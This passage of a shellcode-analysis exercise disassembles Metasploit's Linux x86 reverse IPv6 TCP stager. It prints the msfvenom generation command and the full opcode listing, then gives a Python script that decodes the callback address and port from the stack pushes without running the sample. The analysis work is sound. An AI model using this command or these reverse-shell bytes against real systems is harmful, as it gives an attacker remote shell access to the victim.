5.2 - REVERSE IPv6 TCP
- The shellcode analyzed in this exercise is reverse_ipv6_tcp, whose purpose is to spawn a command shell and connect back to the attacker over the IPv6 protocol.
- First, the ndisasm command disassembles the payload, printing the corresponding assembly instructions alongside their opcodes:
root@kali:~# msfvenom -p linux/x86/shell/reverse_ipv6_tcp R |ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 77 bytes
00000000 31DB xor ebx,ebx
00000002 53 push ebx
00000003 43 inc ebx
00000004 53 push ebx
00000005 6A0A push byte +0xa
00000007 89E1 mov ecx,esp
00000009 6A66 push byte +0x66
0000000B 58 pop eax
0000000C CD80 int 0x80
0000000E 96 xchg eax,esi
0000000F 99 cdq
00000010 6800000000 push dword 0x0
00000015 68C0A8010C push dword 0xc01a8c0
0000001A 6800005EFE push dword 0xfe5e0000
0000001F 6800000000 push dword 0x0
00000024 68FE800000 push dword 0x80fe
00000029 52 push edx
0000002A 6668115C push word 0x5c11
0000002E 66680A00 push word 0xa
00000032 89E1 mov ecx,esp
00000034 6A1C push byte +0x1c
00000036 51 push ecx
00000037 56 push esi
00000038 89E1 mov ecx,esp
0000003A 43 inc ebx
0000003B 43 inc ebx
0000003C 6A66 push byte +0x66
0000003E 58 pop eax
0000003F CD80 int 0x80
00000041 89F3 mov ebx,esi
00000043 B60C mov dh,0xc
00000045 B003 mov al,0x3
00000047 CD80 int 0x80
00000049 89DF mov edi,ebx
0000004B FFE1 jmp ecx
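The pushes between the cdq and the second mov ecx,esp build, on the stack, the sockaddr_in6 structure that the socketcall(SYS_CONNECT) below hands to connect(). As an added analysis example (not part of the original writeup and not Metasploit's code), the following Python script replays those pushes to rebuild the stack image and decodes it as a sockaddr_in6, which is how the callback address and port are recovered from a sample without executing it. The SOCKADDR_LISTING constant is a copy of the page's own ndisasm lines; the only assumption is the one the shellcode itself makes, that cdq leaves edx equal to zero.

```python
import re
import socket
import struct

# The sockaddr_in6 construction, copied from the ndisasm listing above:
# from the cdq that zeroes edx up to the last push before "mov ecx,esp".
SOCKADDR_LISTING = """
0000000F 99 cdq
00000010 6800000000 push dword 0x0
00000015 68C0A8010C push dword 0xc01a8c0
0000001A 6800005EFE push dword 0xfe5e0000
0000001F 6800000000 push dword 0x0
00000024 68FE800000 push dword 0x80fe
00000029 52 push edx
0000002A 6668115C push word 0x5c11
0000002E 66680A00 push word 0xa
"""

# Matches "<offset> <opcodes> push <dword|word> 0x..." as well as "push edx".
PUSH_RE = re.compile(
    r"^[0-9A-Fa-f]+\s+[0-9A-Fa-f]+\s+push\s+(dword|word|edx)\s*(0x[0-9A-Fa-f]+)?$"
)

# sin6_family, sin6_port, sin6_flowinfo, sin6_addr, sin6_scope_id
SOCKADDR_IN6_FMT = "<HHI16sI"
SOCKADDR_IN6_LEN = struct.calcsize(SOCKADDR_IN6_FMT)  # 28 == the 0x1c pushed as addrlen


def build_stack(listing: str) -> bytes:
    """Replay the push sequence and return the bytes esp points at afterwards.

    The stack grows downward, so each push places its little-endian immediate
    in front of everything pushed before it.
    """
    edx = None
    stack = b""
    for line in listing.strip().splitlines():
        if line.split()[2] == "cdq":
            # cdq sign-extends eax into edx; the shellcode relies on this yielding 0
            # (assumption: it is what makes sin6_flowinfo zero in the structure).
            edx = 0
            continue
        m = PUSH_RE.match(line)
        if not m:
            raise ValueError(f"unsupported instruction in listing: {line!r}")
        operand, imm = m.groups()
        if operand == "edx":
            if edx is None:
                raise ValueError("push edx before edx was defined")
            chunk = struct.pack("<I", edx)
        elif operand == "dword":
            chunk = struct.pack("<I", int(imm, 16))
        else:  # "word": the 66 prefix in the opcodes makes it a 16-bit push
            chunk = struct.pack("<H", int(imm, 16))
        stack = chunk + stack
    return stack


def decode_sockaddr_in6(data: bytes) -> dict:
    """Interpret the stack image as the sockaddr_in6 handed to connect()."""
    if len(data) != SOCKADDR_IN6_LEN:
        raise ValueError(f"expected {SOCKADDR_IN6_LEN} bytes, got {len(data)}")
    family, _, flowinfo, addr, scope_id = struct.unpack(SOCKADDR_IN6_FMT, data)
    # sin6_port is stored in network byte order, unlike sin6_family.
    port = struct.unpack("!H", data[2:4])[0]
    return {
        "family": family,  # 10 == AF_INET6 on Linux
        "port": port,
        "flowinfo": flowinfo,
        "address": socket.inet_ntop(socket.AF_INET6, addr),
        # The low 32 bits of this address read as a dotted-quad IPv4 address;
        # ::5efe:w.x.y.z is the ISATAP interface-identifier form.
        "embedded_ipv4": socket.inet_ntop(socket.AF_INET, addr[12:]),
        "scope_id": scope_id,
    }


if __name__ == "__main__":
    image = build_stack(SOCKADDR_LISTING)
    print(f"addrlen pushed by the shellcode: 0x1c, structure rebuilt: {len(image):#x}")
    for key, value in decode_sockaddr_in6(image).items():
        print(f"{key:>14}: {value}")
```

The rebuilt image is exactly 28 bytes, the same 0x1c that the shellcode pushes as the third argument of connect() right after mov ecx,esp, which confirms that the structure was cut at the right boundary. The preceding socketcall (eax = 0x66, ebx = 1 for SYS_SOCKET) receives the argument array [0xa, 1, 0] built by push ebx / inc ebx / push ebx / push 0xa, that is socket(AF_INET6, SOCK_STREAM, 0); the second socketcall (ebx incremented twice to 3, SYS_CONNECT) receives [esi, ecx, 0x1c], the descriptor, the structure decoded here and its length.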
- Launching the sctest command from the libemu tools starts the emulation; at the end, two syscalls, socket() and connect(), are displayed:
- The reverse_ipv6.dot graph is converted into reverse_ipv6.png:
- reverse_ipv6.png shows the phases of the shellcode and the syscalls socket() and connect():